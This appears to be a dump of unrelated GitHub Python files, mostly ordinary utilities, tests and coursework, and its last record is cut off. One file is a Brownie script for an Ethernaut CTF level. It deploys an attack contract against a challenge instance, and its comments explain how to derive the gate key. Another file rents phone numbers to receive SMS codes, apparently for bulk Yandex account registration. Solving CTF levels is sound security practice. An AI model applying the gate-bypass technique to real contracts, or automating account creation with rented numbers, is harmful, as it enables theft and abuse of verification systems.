model\n\n Args:\n - original_img (np.ndarray): original high resolution image\n - upscaled_img (np.ndarray): upscaled image\n\n Returns:\n - lpips (float): LPIPS (Learned Perceptual Image Patch Similarity) metric\n - ssim (float): SSIM (structural similarity index measure) metric\n - psnr (float): PSNR (peak signal-to-noise ratio) metric\n \"\"\"\n lpips = calculate_lpips_distance(original_img, upscaled_img, device)\n\n if torch.is_tensor(original_img):\n original_img = original_img.permute(1,2,0).detach().cpu().numpy()\n\n\n if torch.is_tensor(upscaled_img):\n upscaled_img = upscaled_img.permute(1,2,0).detach().cpu().numpy()\n\n\n ssim = skimage.metrics.structural_similarity(original_img, upscaled_img, channel_axis=2)\n psnr = skimage.metrics.peak_signal_noise_ratio(original_img, upscaled_img)\n\n return lpips, ssim, psnr\n\n\ndef calculate_lpips_distance(img1, img2, device):\n \"\"\"\n Calculates LPIPS distance (also called perceptual loss).\n Reference: \"The Unreasonable Effectiveness of Deep Features as a Perceptual Metric\"\n Richard Zhang, Phillip Isola, Alexei A. Efros, Eli Shechtman, Oliver Wang. In CVPR, 2018.\n\n Args:\n - img1 (np.ndarray): fisrt image to compare\n - img2 (np.ndarray): second image to compare\n\n Returns:\n - lpips_distance (float): LPIPS distance\n \"\"\"\n img_shape = img1.shape\n\n if not torch.is_tensor(img1):\n img1 = torch.tensor(img1).permute(2,0,1).float()\n\n if not torch.is_tensor(img2):\n img2 = torch.tensor(img2).permute(2,0,1).float()\n\n mean1, std1 = img1.mean([1,2]), img1.std([1,2])\n mean2, std2 = img2.mean([1,2]), img2.std([1,2])\n\n # define custom transform\n # here we are using our calculated\n # mean & std\n transform1 = transforms.Compose([\n #transforms.ToTensor(),\n transforms.Normalize(mean1, std1)\n #transforms.Normalize()\n ])\n\n transform2 = transforms.Compose([\n #transforms.ToTensor(),\n transforms.Normalize(mean2, std2)\n #transforms.Normalize()\n ])\n\n img1 = transform1(img1)\n img2 = transform2(img2)\n\n loss_fn = lpips.LPIPS(net='alex').to(device) # best forward scores\n #loss_fn = lpips.LPIPS(net='vgg') # closer to \"traditional\" perceptual loss, when used for optimization\n\n img1 = img1.to(device)\n img2 = img2.to(device)\n\n\n lpips_distance = loss_fn(img1, img2).item()\n\n return lpips_distance\n","repo_name":"williamdevena/Image_Super_Resolution","sub_path":"utils/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"2600004246","text":"#!/usr/local/bin/python3\n#Open the file name data.txt in Write Mode\nfile1 = open(\"data.txt\",\"w\") \ndata = list()\n\n#select the amount of data one need to write\n#redis_key : You redis where you want to insert\n#redis_subkey : Key name\n#redis_subvalue : Value that belongs to the key\nfor i in range(100):\n\tdata.append(\"HSET redis_key \"+str(i)+\"redis_subkey redis_subvalue \\n\")\n\nfile1.writelines(data) \nfile1.close()\n","repo_name":"willsc/redis-enterprise","sub_path":"redismassdata.py","file_name":"redismassdata.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12615767262","text":"# Assignment 10.1 - File Processing\r\n# CIS 245 - Michael Montana\r\n# 20 February 2022\r\n# =================================================================================================================================================================================\r\n# This week we will create a program that performs file processing activities.\r\n# Your program this week will use the OS library in order to validate that a directory exists before creating a file in that directory.\r\n# Your program will prompt the user for the directory they would like to save the file in as well as the name of the file.\r\n# The program should then prompt the user for their name, address, and phone number.\r\n# Your program will write this data to a comma separated line in a file and store the file in the directory specified by the user.\r\n# Once the data has been written your program should read the file you just wrote to the file system and display the file contents to the user for validation purposes.\r\n# Submit a link to your Github repository.\r\n# ================================================================================================================================================================================\r\nimport os\r\nyeslist = ['y', 'ye', 'yes', '']\r\n\r\n\r\ndef openWrite(fileComp, userName, address, phoneNum): # open and write file\r\n with open(fileComp, 'w')as fileHandle:\r\n fileHandle.write('{}, {}, {}'.format(userName, address, phoneNum))\r\n print('You\\'ve written following text to the file:\\n')\r\n\r\n\r\ndef openRead(fileComp): # open and read file\r\n with open(fileComp, 'r') as fileHandle:\r\n fileRead = fileHandle.read()\r\n print(fileRead)\r\n\r\n\r\n# open and append on the next line of a file\r\ndef openAppend(fileComp, userName, address, phoneNum):\r\n with open(fileComp, 'a')as fileHandle:\r\n fileHandle.write('\\n{}, {}, {}'.format(userName, address, phoneNum))\r\n print('You\\'ve appended the following text to the file:\\n')\r\n\r\n\r\ndef fileUpdate(fileComp, userName, address, phoneNum, oaChoice):\r\n if oaChoice == '1':\r\n openWrite(fileComp, userName, address, phoneNum)\r\n openRead(fileComp)\r\n else:\r\n openAppend(fileComp, userName, address, phoneNum)\r\n openRead(fileComp)\r\n\r\n\r\ndef fileInfo():\r\n filePath = input(\r\n '\\nPlease provide the directory you would like the file stored: ')\r\n # if dir does not exist loop for another input\r\n if os.path.isdir(filePath) is False:\r\n while os.path.isdir(filePath) is False:\r\n filePath = input(\r\n 'The provided directory does not exist. Please provide a valid directory: ')\r\n else:\r\n print('\\nYour Directory was found.')\r\n fileName = '\\\\' + input('\\nPlease provide a file name:')+'.txt'\r\n fileComp = filePath + fileName\r\n return fileComp\r\n\r\n\r\ndef user():\r\n userName = input('Please enter your name: ')\r\n address = input('Please enter your address: ')\r\n phoneNum = input('Please enter your phone number: ')\r\n return userName, address, phoneNum\r\n\r\n\r\ndef main():\r\n moreFiles = 'yes'\r\n while moreFiles in yeslist:\r\n print(str('This program stores/appends user information to a text file').center(100, '_') + ('\\n'))\r\n print('\\nPlease provide the following:\\n')\r\n userName, address, phoneNum = user()\r\n fileComp = fileInfo()\r\n if os.path.exists(fileComp):\r\n print('\\nThe file already exists, and contains the following:')\r\n openRead(fileComp)\r\n oaChoice = input(\r\n '\\nSelect one of the following options:\\n[1] Overwrite File\\n[2]Append to File\\n')\r\n while oaChoice != '1' and oaChoice != '2':\r\n oaChoice = input(\r\n '\\nChoose 1 to Overwrite File; or 2 to Append to File:')\r\n fileUpdate(fileComp, userName, address, phoneNum, oaChoice)\r\n else:\r\n oaChoice = 1\r\n print('\\nYou are creating a new file.\\n')\r\n fileUpdate(fileComp, userName, address, phoneNum, oaChoice)\r\n moreFiles = input(\r\n '\\nWould you like to add user information to additional files (yes/no)?\\n')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"StrangerBeneath/CIS245","sub_path":"Assignment 10.1 File Processing - Montana.py","file_name":"Assignment 10.1 File Processing - Montana.py","file_ext":"py","file_size_in_byte":4203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33365894637","text":"from scripts.helpful_scripts import get_account\nfrom brownie import web3, interface, Attack14\n\n\nETHERNAUT_INSTANCE = \"0xc47e9de2c5a85084f777f94C926585ea49490E1a\"\nPLAYER = \"0xF8f8269488f73fab3935555FCDdD6035699deE25\"\nGAS_LIMIT = 6000000\n\n\ndef main():\n\n player = get_account()\n Attack14.deploy(\n ETHERNAUT_INSTANCE,\n {\"from\": player, \"gas_limit\": GAS_LIMIT, \"allow_revert\": True},\n )\n\n\n# Gate One: deploy proxy contract (conflict with Gate Two) <-- PROBLEM_1\n\n\n# Gate Two: Require that the 'codesize' (in bytes) of the code at the call address\n# is equal to zero. So caller needs to have zero code size\n#\n# --> unless the call is made from the constructor of a smart contract <-- SOLVED_1\n\n\n# Gate Three:\n#\n# uint64(bytes8(keccak256(abi.encodePacked(msg.sender)))) XOR uint64(_gateKey)\n# = type(uint64).max\n\n\n# uint64 gateKey = uint64(bytes8(keccak256(abi.encodePacked(address(this))))) ^ type(uint64).max\n#\n# where address(this) is the address of the attack contract that is \"in the process\" of being deployed\n","repo_name":"sarobinson2011/ethernaut-brownie","sub_path":"scripts/14-scripts/14-deploy_attack.py","file_name":"14-deploy_attack.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18699664938","text":"\"\"\"\nManejo de errores en Python\n\nEn Python, utilizamos bloques try/except para manejar errores o excepciones que pueden surgir durante la ejecución de un programa. \n\nPodemos manejar diferentes tipos de errores especificando diferentes bloques except para cada tipo de error.\n\"\"\"\n\n# Ejemplo básico de manejo de errores\ntry:\n # intentamos dividir por cero, lo cual causará un error\n x = 1 / 0\nexcept ZeroDivisionError:\n print(\"Error: División por cero.\")\n\n# También podemos manejar múltiples errores. Aquí intentaremos convertir una cadena a un número\ntry:\n # intentamos convertir una cadena a un número, lo cual causará un error\n y = int(\"Hola Mundo\")\nexcept ValueError:\n print(\"Error: No se puede convertir la cadena a número.\")\n\n# Podemos usar un bloque 'finally' para ejecutar código independientemente de si ocurrió un error o no\ntry:\n # intentamos dividir por cero nuevamente\n x = 1 / 0\nexcept ZeroDivisionError:\n print(\"Error: División por cero.\")\nfinally:\n print(\"Esto se imprime independientemente de si ocurrió un error o no.\")\n\n# También podemos lanzar nuestros propios errores con la palabra clave 'raise'\ntry:\n # lanzamos un error con un mensaje personalizado\n raise ValueError(\"Este es un error personalizado.\")\nexcept ValueError as e:\n print(f\"Error: {e}\")\n","repo_name":"apholdings/Ciencia_de_Datos_con_Python","sub_path":"1) Programacion Python/errores.py","file_name":"errores.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"es","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"31447537344","text":"from typing import Any, Dict, List, Type, TypeVar\n\nimport attr\n\nT = TypeVar(\"T\", bound=\"Link\")\n\n\n@attr.s(auto_attribs=True)\nclass Link:\n \"\"\"\n Attributes:\n url (str): Example: http://url.\n name (str): Example: link.\n \"\"\"\n\n url: str\n name: str\n additional_properties: Dict[str, Any] = attr.ib(init=False, factory=dict)\n\n def to_dict(self) -> Dict[str, Any]:\n url = self.url\n name = self.name\n\n field_dict: Dict[str, Any] = {}\n field_dict.update(self.additional_properties)\n field_dict.update(\n {\n \"url\": url,\n \"name\": name,\n }\n )\n\n return field_dict\n\n @classmethod\n def from_dict(cls: Type[T], src_dict: Dict[str, Any]) -> T:\n d = src_dict.copy()\n url = d.pop(\"url\")\n\n name = d.pop(\"name\")\n\n link = cls(\n url=url,\n name=name,\n )\n\n link.additional_properties = d\n return link\n\n @property\n def additional_keys(self) -> List[str]:\n return list(self.additional_properties.keys())\n\n def __getitem__(self, key: str) -> Any:\n return self.additional_properties[key]\n\n def __setitem__(self, key: str, value: Any) -> None:\n self.additional_properties[key] = value\n\n def __delitem__(self, key: str) -> None:\n del self.additional_properties[key]\n\n def __contains__(self, key: str) -> bool:\n return key in self.additional_properties\n","repo_name":"truehostcloud/artifact-hub-client","sub_path":"artifact_hub_client/models/link.py","file_name":"link.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43389590594","text":"import fauxfactory\nimport pytest\n\nfrom hansei import config\nfrom hansei.koku_models import KokuCustomer, KokuProvider, KokuServiceAdmin, KokuUser\n\n\n@pytest.mark.smoke\nclass TestUserCrud(object):\n @pytest.fixture(scope='class')\n def service_admin(self):\n koku_config = config.get_config().get('koku', {})\n\n return KokuServiceAdmin(\n username=koku_config.get('username'), password=koku_config.get('password'))\n\n @pytest.fixture(scope='class')\n def customer(self, service_admin):\n \"\"\"Create a new Koku customer with random info\"\"\"\n uniq_string = fauxfactory.gen_string('alphanumeric', 8)\n name = 'Customer {}'.format(uniq_string)\n owner = {\n 'username': 'owner_{}'.format(uniq_string),\n 'email': 'owner_{0}@{0}.com'.format(uniq_string),\n 'password': 'redhat', }\n\n #TODO: Implement lazy authentication of the client for new KokuObject()\n customer = service_admin.create_customer(name=name, owner=owner)\n customer.login()\n assert customer.uuid, 'No customer uuid created for customer'\n\n yield customer\n\n service_admin.delete_customer(customer.uuid)\n\n @pytest.fixture(scope='class')\n def user(self, customer):\n \"\"\"Create a new Koku user without authenticating to the server\"\"\"\n uniq_string = fauxfactory.gen_string('alphanumeric', 8)\n\n #TODO: Implement lazy authentication of the client for new KokuObject() fixtures\n user = customer.create_user(\n username='user_{}'.format(uniq_string),\n email='user_{0}@{0}.com'.format(uniq_string),\n password='redhat')\n\n user.login()\n yield user\n\n customer.delete_user(user.uuid)\n\n @pytest.fixture(scope='class')\n def provider(self, user):\n \"\"\"Create a new KokuProvder\"\"\"\n uniq_string = fauxfactory.gen_string('alphanumeric', 8)\n #Grab the first AWS provider\n provider_config = [\n prov for prov in config.get_config().get('providers', {}) if prov['type'] == 'AWS'][0]\n\n #TODO: Implement lazy authentication of the client for new KokuObject() fixtures\n provider = user.create_provider(\n name='Provider {} for user {}'.format(uniq_string, user.username),\n authentication=provider_config.get('authentication'),\n provider_type=provider_config.get('type'),\n billing_source=provider_config.get('billing_source'))\n\n return provider\n\n def test_provider_create(self, provider):\n \"\"\"Create a new provider\"\"\"\n\n # All requests will throw an exception if response is an error code\n assert provider.uuid, 'No uuid created for provider'\n\n def test_provider_read(self, provider, user):\n \"\"\"Read the provider data from the server\"\"\"\n server_provider = user.read_provider(provider.uuid)\n\n # TODO: Overload equivalence for KokuObjects\n assert server_provider.uuid == provider.uuid, 'Provider info cannot be read from the server'\n\n provider_list = user.list_providers()\n assert len(provider_list) > 0, 'No providers available on server'\n\n provider_uuid_list = [provider.uuid for provider in provider_list]\n assert provider.uuid in provider_uuid_list, 'Provider uuid is not listed in the Koku server list'\n\n\n @pytest.mark.skip(reason=\"User update not implemented\")\n def test_provider_update(self):\n \"\"\"Update an existing provider\"\"\"\n assert 0\n\n def test_provider_delete(self, provider, user):\n \"\"\"Delete the provider from the server\"\"\"\n user.delete_provider(provider.uuid)\n provider_list = user.list_providers()\n\n for server_provider in provider_list:\n assert server_provider.uuid != provider.uuid, \"User was not deleted from the koku server\"\n","repo_name":"nachandr/hansei","sub_path":"hansei/tests/api/v1/test_provider.py","file_name":"test_provider.py","file_ext":"py","file_size_in_byte":3835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"3382256339","text":"\"\"\"\nYou are given two arrays (without duplicates) nums1 and nums2 where nums1’s\nelements are subset of nums2.Find all the next greater numbers for nums1's\nelements in the corresponding places of nums2.\n\nThe Next Greater Number of a number x in nums1 is the first greater number to\nits right in nums2. If it does not exist, output -1 for this number.\n\nExample:\nInput: nums1 = [4,1,2], nums2 = [1,3,4,2].\nOutput: [-1,3,-1]\nExplanation:\n 1) For number 4 in the first array, you cannot find the next greater number\n for it in the second array, so output -1.\n 2) For number 1 in the first array, the next greater number for it in the\n second array is 3.\n 3) For number 2 in the first array, there is no next greater number for it\n in the second array, so output -1.\n\"\"\"\n\nclass Solution(object):\n\n def nextGreaterElement(self, findNums, nums):\n \"\"\"\n :type findNums: List[int]\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n l1 = len(findNums) # nums1\n l2 = len(nums) # nums2\n out = []\n for i in range(l1):\n n = findNums[i]\n begin = nums.index(n)\n if n >= max(nums[begin:l2]): # if there is no greater value\n out.append(-1) # append -1\n else:\n for j in range(begin, l2): # if there is greater value\n if n < nums[j]:\n out.append(nums[j]) # append the 1st greater value\n break # then break the loop\n return out\n\nif __name__ == '__main__':\n print(Solution().nextGreaterElement([4,1,2],[1,3,4,2]))\n","repo_name":"dawnyoung/LeetCode","sub_path":"496-NextGreaterElement1.py","file_name":"496-NextGreaterElement1.py","file_ext":"py","file_size_in_byte":1666,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38165710121","text":"\n@dataclass\nclass CreateTrackRequest:\n classifier_sets: List[AudioClassifierSet]\n file: Any\n metadata: ContentMetadata\n title: str\n\n @staticmethod\n def from_dict(obj: Any) -> 'CreateTrackRequest':\n assert isinstance(obj, dict)\n classifier_sets = from_list(AudioClassifierSet.from_dict, obj.get(\"classifierSets\"))\n file = obj.get(\"file\")\n metadata = ContentMetadata.from_dict(obj.get(\"metadata\"))\n title = from_str(obj.get(\"title\"))\n return CreateTrackRequest(classifier_sets, file, metadata, title)\n\n def to_dict(self) -> dict:\n result: dict = {}\n result[\"classifierSets\"] = from_list(lambda x: to_class(AudioClassifierSet, x), self.classifier_sets)\n result[\"file\"] = self.file\n result[\"metadata\"] = to_class(ContentMetadata, self.metadata)\n result[\"title\"] = from_str(self.title)\n return result\n","repo_name":"aidanmckenna/content_management","sub_path":"tracks/service/requests.py","file_name":"requests.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30499003091","text":"from django.shortcuts import render\n\nfrom .models import InstagramImage, Accueil_1Entete, Accueil_2Entete, PhotosProfessionnelle, PhotosPackshot, PhotosNature, PhotosBabyShoot, PhotosMariage, PhotosSeancesShooting, Suggestion, ImagePub, NosServiceAccueil,ImagePage1, ImagePage2, ImagePage3\n\n\nfrom .formulaire import SuggestionForm, ReservationForm\n#==========================page accueil==============================\ndef index(request):\n exinst = InstagramImage.objects.all()\n entete1 = Accueil_1Entete.objects.all()\n entete2 = Accueil_2Entete.objects.all()\n\n album1 = PhotosProfessionnelle.objects.all()\n album2 = PhotosPackshot.objects.all()\n album3 = PhotosNature.objects.all()\n album4 = PhotosBabyShoot .objects.all()\n album5 = PhotosMariage .objects.all()\n album6 = PhotosSeancesShooting.objects.all()\n\n return render(request, \"Pages/index.html\", {'insta':exinst, 'tete1':entete1, 'tete2':entete2, 'alb1':album1, 'alb2':album2, 'alb3':album3, 'alb4':album4, 'alb5':album5, 'alb6':album6, 'pub':ImagePub.objects.all(), 'service':NosServiceAccueil.objects.all(),'message':Suggestion.objects.all()})\n\n#===========================page contact==============================\ndef contact(request):\n exinst = InstagramImage.objects.all()\n if request.method == \"POST\":\n form = ReservationForm(request.POST).save()\n form = ReservationForm()\n\n return render(request, \"Pages/contact.html\", {'form' : form , 'insta':exinst, 'back':ImagePage1.objects.all()})\n\n#===========================page galerie==============================\ndef galerie(request):\n\texinst = InstagramImage.objects.all()\n\n\n\talbum1 = PhotosProfessionnelle.objects.all()\n\talbum2 = PhotosPackshot.objects.all()\n\talbum3 = PhotosNature.objects.all()\n\talbum4 = PhotosBabyShoot .objects.all()\n\talbum5 = PhotosMariage .objects.all()\n\talbum6 = PhotosSeancesShooting.objects.all()\n\treturn render(request, \"Pages/galerie.html\", {'insta':exinst, 'alb1':album1, 'alb2':album2, 'alb3':album3, 'alb4':album4, 'alb5':album5, 'alb6':album6, 'back':ImagePage2.objects.all()})\n\n#===========================page a_propos==============================\ndef a_propos(request):\n if request.method == \"POST\":\n form = SuggestionForm(request.POST).save()\n form = SuggestionForm()\n exinst = InstagramImage.objects.all()\n return render(request, \"Pages/a_propos.html\", {'insta':exinst, 'Sug':form, 'back':ImagePage3.objects.all(),'img1':ImagePage2.objects.all(),'img2':ImagePage3.objects.all()})\n\n","repo_name":"NED-dev-2020/NED_service","sub_path":"ex_service/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34662983209","text":"from PyQt5.QtWidgets import (QDialog, QGridLayout, QHBoxLayout,\n QPushButton, QSizePolicy, QSpacerItem)\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtGui import QIcon\n\nfrom ..widgets.device_select import DeviceSelectWidget\nfrom ..widgets.device_config import DeviceConfigWidget\n\nclass DeviceListConfigDialog(QDialog):\n def __init__(self, mrc, parent=None):\n super().__init__(parent)\n self.setWindowTitle(\"Configure Device\")\n self.mrc = mrc\n self.layout = QGridLayout()\n\n self.selected_device = None\n self.device_select_widget = DeviceSelectWidget(mrc, \"DM\")\n self.layout.addWidget(self.device_select_widget, 0, 0)\n\n self.config_widget = DeviceConfigWidget(mrc)\n self.config_widget.config_changed.connect(self.config_changed)\n self.layout.addWidget(self.config_widget, 0, 1)\n\n self.button_layout = QHBoxLayout()\n button_spacer = QSpacerItem(1, 1, QSizePolicy.Expanding,\n QSizePolicy.Fixed)\n self.button_layout.addItem(button_spacer)\n\n self.cancel_button = QPushButton(\"Cancel\")\n self.cancel_button.setIcon(QIcon(\":/delete.png\"))\n self.cancel_button.setSizePolicy(QSizePolicy(QSizePolicy.Fixed,\n QSizePolicy.Fixed))\n self.cancel_button.setFocusPolicy(Qt.NoFocus)\n self.cancel_button.clicked.connect(self.close)\n self.button_layout.addWidget(self.cancel_button, Qt.AlignRight)\n\n self.submit_button = QPushButton(\"Apply\")\n self.submit_button.setIcon(QIcon(\":/checkmark.png\"))\n self.submit_button.setSizePolicy(QSizePolicy(QSizePolicy.Fixed,\n QSizePolicy.Fixed))\n self.submit_button.setFocusPolicy(Qt.NoFocus)\n self.submit_button.clicked.connect(self.submit)\n self.button_layout.addWidget(self.submit_button, Qt.AlignRight)\n\n self.layout.addLayout(self.button_layout, 1, 1)\n self.submit_button.setEnabled(False)\n\n self.setLayout(self.layout)\n\n self.device_select_widget.device_selected.connect(self.device_selected)\n self.config_widget.config_changed.connect(self.config_changed)\n\n def device_selected(self, device):\n self.submit_button.setEnabled(False)\n self.selected_device = device\n self.config_widget.prepare_config_list(device)\n\n def config_changed(self):\n self.submit_button.setEnabled(True)\n self.submit_button.clearFocus()\n self.config_widget.setFocus()\n\n def submit(self):\n self.config_widget.submit()\n self.close()\n\n","repo_name":"CasperVector/mamba-ose","sub_path":"mamba/gengyd/dialogs/device_list_config.py","file_name":"device_list_config.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29896297673","text":"from pathlib import Path\n\n\nclass Task():\n def __init__(self, id, name, completed=False):\n '''\n Task model\n\n :param id: integer\n\n :param name:str\n\n :param completed: str\n '''\n self.name = name\n self.completed = completed\n self.id = id\n","repo_name":"cruzortiz99/basics-python-flask-course","sub_path":"to-do-list/src/models/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5423355545","text":"import sys, sched, time\n\nclass Timer(object):\n\n def __init__(self, minutes):\n self.schedule = sched.scheduler(time.time, time.sleep)\n self.minutes = minutes\n\n def _times_up(self):\n sys.stdout.write('Timer of ' + str(self.minutes) + ' minutes is up!')\n\n def run(self):\n self.schedule.enter(60 * self.minutes, 1, self._times_up, ())\n self.schedule.run()\n\n\nquery = int(\"{query}\")\n\nif query > 120:\n query = 120\n\ntimer = Timer(query)\ntimer.run()\n","repo_name":"bearzk/alfred-workflows","sub_path":"timer/src/timer.py","file_name":"timer.py","file_ext":"py","file_size_in_byte":488,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24046817413","text":"# handlers\nfrom django.urls import path\n\nfrom .views import LoginAPIView, ProfileAPIView, RegistrationAPIView\n\napp_name = 'users'\nurlpatterns = [\n path('sign-up/', RegistrationAPIView.as_view()),\n path('sign-in/', LoginAPIView.as_view()),\n path('profile/', ProfileAPIView.as_view())\n]\n","repo_name":"alikud/django_temlate_with_jwt","sub_path":"users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4067630581","text":"import numpy as np\nimport collections\n\nfrom crystal_system import cubic\nfrom src.pymatgen_wrappers import cif_parser_wrapper\nfrom src.utils import Set\nfrom src import qcore_input_strings as qcore_input\nfrom src.run_qcore import run_qcore\n\nfrom energy_vs_volume import ev_functions\n\n\n# MgO, NaCl, Si, Diamond (carbon), Ge (although could be an issue)\n# Add in a few more\n\ndef magnesium_oxide():\n file_name = '../' + cubic.conventional_fcc_cifs['magnesium_oxide'].file\n crystal = cif_parser_wrapper(file_name, fractional=True, is_primitive_cell=False, bravais='cubic')\n\n unit = ev_functions.get_position_unit(crystal)\n lattice_constant_factors = np.linspace(0.8, 1.2, 21, endpoint=True)\n lattice_constants = ev_functions.cubic_lattice_constants(crystal, lattice_constant_factors)\n\n named_result = 'mgo_volume'\n settings = collections.OrderedDict([\n ('h0_cutoff', Set(40, 'bohr')),\n ('overlap_cutoff', Set(40, 'bohr')),\n ('repulsive_cutoff', Set(40, 'bohr')),\n # Ewald setting for hard-cutoff of potential at 30 bohr\n ('ewald_real_cutoff', Set(40, 'bohr')),\n # Converged w.r.t. real-space value\n ('ewald_reciprocal_cutoff', Set(10)),\n ('ewald_alpha', Set(0.5)),\n ('monkhorst_pack', Set([2, 2, 2])),\n ('symmetry_reduction', Set(True)),\n ('temperature', Set(0, 'kelvin')),\n ('solver', Set('SCC'))\n ])\n\n total_energies = np.zeros(shape=(lattice_constant_factors.size))\n for i,al in enumerate(lattice_constants):\n lattice_factor = lattice_constant_factors[i]\n crystal['lattice_parameters']['a'] = Set(al, unit)\n input_string = qcore_input.xtb_input_string(crystal, settings, named_result=named_result)\n output = run_qcore(input_string)\n if not output:\n print('No result:', lattice_factor)\n else:\n total_energies[i] = output[named_result]['energy']\n # 4.19 ang is exp. See \"Ab initio determination of the bulk properties of Mgo\"\n print(lattice_factor, al, output[named_result]['energy'])\n\n return lattice_constant_factors, total_energies\n","repo_name":"AlexBuccheri/QcoreUtils","sub_path":"energy_vs_volume/crystal_inputs.py","file_name":"crystal_inputs.py","file_ext":"py","file_size_in_byte":2224,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"3209881139","text":"# Less than 17, advise to \"Hit\"\n# Greater than or equal to 17, but less than 21, advise to \"Stay\"\n# Exactly 21, advise \"Blackjack!\"\n# Over 21, advise \"Already Busted\"\n\n# create card_total dict\ncard_total = {'1': 1, '2': 2, '3': 3, '4': 4, '5': 5, '6': 6, '7': 7, '8': 8, '9': 9, '10': 10, 'J': 10, 'Q': 10, 'K': 10, 'A': 1}\n\n# define blackjack_advice \ndef blackjack_advice(x, y, z):\n sum = card_total[x] + card_total[y] + card_total[z]\n # advise user based on their card total\n if sum < 17:\n advise = f\"\\n{sum} Hit!\\n\"\n elif 21 > sum >= 17:\n advise = f\"\\n{sum} Stay.\\n\"\n elif sum == 21:\n advise = f\"\\n{sum} Blackjack!\\n\"\n else:\n advise = f\"\\n{sum} Already Busted.\\n\"\n return advise\n\n# welcome user to blackjack advice program\nprint(\"\\nWelcome to the Blackjack Advice program! \")\n\n# prompt user for their cards\nfirst_card = input(\"\\nWhat's your first card?: \").upper()\nsecond_card = input(\"\\nWhat's your second card?: \").upper() \nthird_card = input(\"\\nWhat's your third card?: \").upper()\n\n# print / call blackjack_advice function / advise user\nprint(blackjack_advice(first_card, second_card, third_card))\n\n\n\n\n\n\n\n\n\n\n","repo_name":"PdxCodeGuild/class_llama","sub_path":"code/Eric/Lab19_Blackjack_Advice.py","file_name":"Lab19_Blackjack_Advice.py","file_ext":"py","file_size_in_byte":1164,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27527671966","text":"import re\nfrom onlinesimru import NumbersService\n\n\nclass RentPhoneForSMS:\n \"\"\" Retrieves phone number via API from onlinesimru \"\"\"\n\n service = NumbersService('')\n\n def get_phone_number(self) -> tuple:\n \"\"\" Returns new number and it's tzid \"\"\"\n\n new_number = self.service.get('Yandex', country=77, number=True)\n return new_number['number'], new_number['tzid']\n\n def get_phone_code(self, tzid: int):\n \"\"\" Waits and returns code which has been sent to phone \"\"\"\n\n code = self.service.wait_code(tzid, timeout=10)\n\n return re.sub(r'[0-9]]', '', code)\n","repo_name":"chimchimster/yandex_accounts_registrator","sub_path":"phone_number_getter.py","file_name":"phone_number_getter.py","file_ext":"py","file_size_in_byte":600,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23689246412","text":"from build.lib.libcloud.storage.types import Provider\nfrom build.lib.libcloud.storage.providers import get_driver\n\ncls = get_driver(Provider.AZURE_BLOBS)\n\ndriver = cls(\n key=\"your storage account name\",\n secret=\"your service principal secret key\",\n tenant_id=\"your tenant id\",\n identity=\"your service principal application id\",\n auth_type=\"azureAd\",\n)\n","repo_name":"apache/libcloud","sub_path":"docs/examples/storage/azure/instantiate_azure_ad.py","file_name":"instantiate_azure_ad.py","file_ext":"py","file_size_in_byte":367,"program_lang":"python","lang":"en","doc_type":"code","stars":1969,"dataset":"github-code","pt":"37"} +{"seq_id":"29775589360","text":"'''\r\nAuthor: Luke Olson\r\nUses the sentence transformer library to calculate the cosine similarity between\r\n2 given text files\r\n'''\r\nfrom sentence_transformers import SentenceTransformer, util\r\nfrom nltk import sent_tokenize\r\nfrom pandas import DataFrame\r\nfrom plotly.express import line\r\nimport glob\r\nimport torch\r\n\r\nSAMPLE_DIR = '../nanoGPT/out-fantasy'\r\nINPUT_DIR = '../data/American fantasy films.txt'\r\n\r\ndef findSimilarity(inPath, outPath):\r\n # gather scripts\r\n inScript = open(inPath, mode = 'r', encoding ='utf-8')\r\n outScript = open(outPath, mode = 'r', encoding ='utf-8')\r\n\r\n # tokenize (use download('punkt') during first run)\r\n\r\n inSentences = sent_tokenize(inScript.read())\r\n outSentences = sent_tokenize(outScript.read())\r\n\r\n # create model\r\n model = SentenceTransformer('all-MiniLM-L6-v2')\r\n\r\n #Compute embedding for both lists\r\n embeddings1 = model.encode(inSentences, convert_to_tensor=True)\r\n embeddings2 = model.encode(outSentences, convert_to_tensor=True)\r\n\r\n #Compute cosine-similarities\r\n cos_sim = util.cos_sim(embeddings1, embeddings2)\r\n\r\n mean = 